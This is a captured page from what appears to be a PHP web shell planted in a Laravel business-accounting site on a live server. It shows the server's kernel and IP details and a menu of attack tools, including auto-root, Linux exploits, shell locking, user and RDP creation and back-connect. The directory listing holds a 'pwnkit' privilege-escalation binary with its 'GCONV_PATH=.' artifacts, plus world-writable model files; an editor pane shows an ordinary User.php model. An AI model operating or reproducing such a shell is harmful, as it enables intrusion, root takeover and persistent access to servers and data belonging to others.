Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo17.com /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
Account.php
827
B
-rw-rw-rw-
Asset.php
392
B
-rw-rw-rw-
Business.php
705
B
-rw-rw-rw-
Category.php
334
B
-rw-rw-rw-
Loan.php
567
B
-rw-rw-rw-
Party.php
189
B
-rw-rw-rw-
ReceivablePayable.php
722
B
-rw-rw-rw-
Setting.php
1.03
KB
-rw-rw-rw-
Transaction.php
1.05
KB
-rw-rw-rw-
TransactionLine.php
445
B
-rw-rw-rw-
User.php
2.13
KB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : User.php
<?php namespace App\Models; // use Illuminate\Contracts\Auth\MustVerifyEmail; use Illuminate\Database\Eloquent\Factories\HasFactory; use Illuminate\Foundation\Auth\User as Authenticatable; use Illuminate\Notifications\Notifiable; class User extends Authenticatable { /** @use HasFactory<\Database\Factories\UserFactory> */ use HasFactory, Notifiable; public const ROLES = ['owner', 'manager', 'accountant', 'staff']; public const ROLE_PERMISSIONS = [ 'owner' => [ 'All businesses', 'Manage users and settings', 'Capital, cash, bank, loans, AR/AP', 'All reports and statements', 'Edit all transactions', ], 'manager' => [ 'Assigned businesses', 'All day-to-day transactions', 'Loans and AR/AP', 'All reports', 'No user/settings control', ], 'accountant' => [ 'Assigned businesses', 'Financial transactions', 'Reports and statements', 'Edit own entries', 'No settings control', ], 'staff' => [ 'Assigned businesses', 'Income entry', 'Basic expense entry', 'No loans, settings, or reports', ], ]; /** * The attributes that are mass assignable. * * @var list<string> */ protected $fillable = [ 'name', 'email', 'role', 'password', ]; /** * The attributes that should be hidden for serialization. * * @var list<string> */ protected $hidden = [ 'password', 'remember_token', ]; /** * Get the attributes that should be cast. * * @return array<string, string> */ protected function casts(): array { return [ 'email_verified_at' => 'datetime', 'password' => 'hashed', ]; } public function businesses() { return $this->belongsToMany(Business::class)->withTimestamps(); } public function isOwner(): bool { return $this->role === 'owner'; } }
Close